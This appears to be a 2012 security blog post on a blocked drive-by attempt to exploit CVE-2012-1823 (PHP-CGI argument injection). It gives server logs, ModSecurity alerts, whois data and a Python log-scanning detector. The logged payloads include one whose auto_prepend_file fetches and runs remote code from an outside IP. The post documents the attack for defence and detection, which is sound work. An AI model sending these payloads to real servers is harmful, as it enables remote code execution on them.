May 11 2012

Attack Introduction

This post demonstrates the security issues faced by websites in a potentially hostile environment like the internet. The following information shows an untargeted and unsuccessful drive-by attack attempt. What is interesting about this attack is the timeline from the initial vulnerability description to the logged exploit attempt.

Vulnerability Description

From CVE-2012-1823: sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.

  • CVE – CVE-2012-1823
  • OSVDB – 81633
  • URL – http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
  • Metasploit URL – https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/php_cgi_arg_injection.rb
  • Google – “-d allow_url_include=on -d auto_prepend_file=php://input -d safe_mode=1 -d suhosin.simulation=1 -d disable_functions=”
  • Disclosure Date – May 03 2012
  • Attack Date – May 11 2012

Attack Access.log

  • 85.114.141.40 - - [11/May/2012:16:59:31 +0100] "POST //?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp://input+-d+safe_mode%3d1+-d+suhosin.simulation%3d1+-d+disable_functions%3d%22%22+-d+open_basedir%3dnone+-n HTTP/1.0" 301 655 "-" "-"
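The probe above works because the literal "=" is percent-encoded: the web server sees a query string with no "=" and, following the CGI spec, hands it to php-cgi as command-line arguments split on "+". As an added detection example (not part of the original post), the Python below re-derives that argv from access-log lines and flags php-cgi switches; the sample input is the post's two logged probes (quotes normalised to ASCII) plus two constructed benign requests.

```python
import re
from urllib.parse import unquote

# Apache access-log prefix: client IP, identd, user, timestamp, request line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)')

# php-cgi switches worth flagging when they arrive via the query string:
# -d sets an INI directive, -n ignores php.ini, -c picks a php.ini path, -s dumps source.
PHP_CGI_SWITCHES = {"-d", "-n", "-c", "-s"}

def query_as_argv(target):
    # The CGI spec passes a QUERY_STRING that contains no unencoded '=' to the
    # script as command-line arguments split on '+'; CVE-2012-1823 is php-cgi
    # then running getopt over them. '%3d' decodes to '=' but does not count.
    if "?" not in target:
        return None
    raw_query = target.split("?", 1)[1]
    if "=" in raw_query:
        return None
    return [unquote(arg) for arg in raw_query.split("+") if arg]

def detect(line):
    """Return a finding dict for a php-cgi argument-injection probe, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    argv = query_as_argv(m.group("target"))
    if not argv:
        return None
    # '-d%20name%3dvalue' decodes to one argument with a space inside; split it
    # so the switch is found whether the probe separated with '+' or '%20'.
    tokens = [tok for arg in argv for tok in arg.split()]
    switches = [tok[:2] for tok in tokens if tok[:2] in PHP_CGI_SWITCHES]
    return {"ip": m.group("ip"), "ts": m.group("ts"), "argv": tokens, "switches": switches} if switches else None

def scan(lines):
    """Run detect() over access-log lines and keep only the findings."""
    return [hit for hit in map(detect, lines) if hit]

# Constructed input: the two probes quoted in the post (quotes normalised to ASCII)
# plus two benign requests, one of them also with an '='-free query string.
SAMPLE_LINES = [
    '85.114.141.40 - - [11/May/2012:16:59:31 +0100] "POST //?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp://input+-d+safe_mode%3d1+-d+suhosin.simulation%3d1+-d+disable_functions%3d%22%22+-d+open_basedir%3dnone+-n HTTP/1.0" 301 655 "-" "-"',
    '69.61.106.55 - - [18/Jun/2012:13:41:28 +0100] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.144/sites/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.144/sites/api.gif%20-n HTTP/1.0" 302 294 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [11/May/2012:17:02:03 +0100] "GET /index.php?page=about HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [11/May/2012:17:02:09 +0100] "GET /search?php+cgi HTTP/1.1" 200 980 "-" "Mozilla/5.0"',
]
```

Running `scan(SAMPLE_LINES)` returns two findings, one per probe, each carrying the decoded argv that php-cgi would have parsed; the benign lines produce none, including the one whose "=" -free query is legitimate.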

Attack Error.log

  • [Fri May 11 16:59:31 2012] [error] [client 85.114.141.40] ModSecurity: Warning. Pattern match "(?i:(?:union\\s*(?:all|distinct|[(!@]*)?\\s*[([]*\\s*select)|(?:\\w+\\s+like\\s+("|'|`|\xc2\xb4|\xe2\x80\x99|\xe2\x80\x98))|(?:like\\s*("|'|`|\xc2\xb4|\xe2\x80\x99|\xe2\x80\x98)\\%)|(?:("|'|`|\xc2\xb4|\xe2\x80\x99|\xe2\x80\x98)\\s*like\\W*[("|'|`|\xc2\xb4|\xe2\x80\x99|\xe2\x80\x98)\\d])|(?:("|'|`|\xc2\xb4|\xe2\x80\x99|\xe2\x80\x98)\\s*(?:n?and|x?x?or|div|like|between|and|not |\\|\\|| ..." at ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input -d safe_mode=1 -d suhosin.simulation=1 -d disable_functions="" -d open_basedir=none -n. [file "/etc/apache2/sites-modsecurity-crs/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "578"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "\\x22 -d o"] [severity "CRITICAL"] [tag "WEB_ATTACK/SQLI"] [tag "WEB_ATTACK/ID"] [tag "WEB_ATTACK/LFI"] [hostname "syndicate.ourpractice.org"] [uri "/"] [unique_id "T603Y7JPpf4AACx2xJgAAAAD"]

Attack Alert

  • May 11 16:59:31 li303-254 suhosin[11382]: ALERT - configured request variable name length limit exceeded - dropped variable '-d_allow_url_include=on_-d_auto_prepend_file=php://input_-d_safe_mode=1_-d_suhosin_simulation=1_-d_disable_functions=""_-d_open_basedir=none_-n' (attacker '85.114.141.40', file '/var/www/ourprac-pub/index.php')

nslookup 85.114.141.40

Non-authoritative answer:

  • 40.141.114.85.in-addr.arpa name = s040.silver.fastwebserver.de.

whois 85.114.141.40

% Information related to '85.114.140.0 - 85.114.143.255'

inetnum: 85.114.140.0 - 85.114.143.255
netname: FASTIT-DE-DUS1-COLO8
descr: fast IT Colocation
country: DE

role: fast IT Operations Team
address: myLoc managed IT AG
address: Am Gatherhof 44
address: 40472 Duesseldorf
address: DE
abuse-mailbox: [email protected]
phone: +49 211 171659 0
fax-no: +49 211 171659 77

role: fibre one NOC
address: fibre one networks GmbH
address: Network Operations & Services
address: Am Gatherhof 44
address: 40472 Duesseldorf
address: Germany
abuse-mailbox: [email protected]
phone: +49 211 171659 40
fax-no: +49 211 171659 49

Hill Street Blues

So that’s 8 days from the disclosure date to a drive-by attack attempt. To quote Sergeant Esterhaus out of context: “Let’s Be Careful Out There,” and to 85.114.141.40: “Auf Wiedersehen, Pet!!”.


  One Response to “CVE-2012-1823: PHP CGI Advisory”

  1. And another attempt from the access.log …

    69.61.106.55 - - [18/Jun/2012:13:41:28 +0100] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.144/sites/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.144/sites/api.gif%20-n HTTP/1.0" 302 294 "-" "Mozilla/5.0"


© 2011 Indimon Internet Services

Site last updated March 11, 2017 @ 9:57 am; This content last updated June 29, 2012 @ 2:49 pm
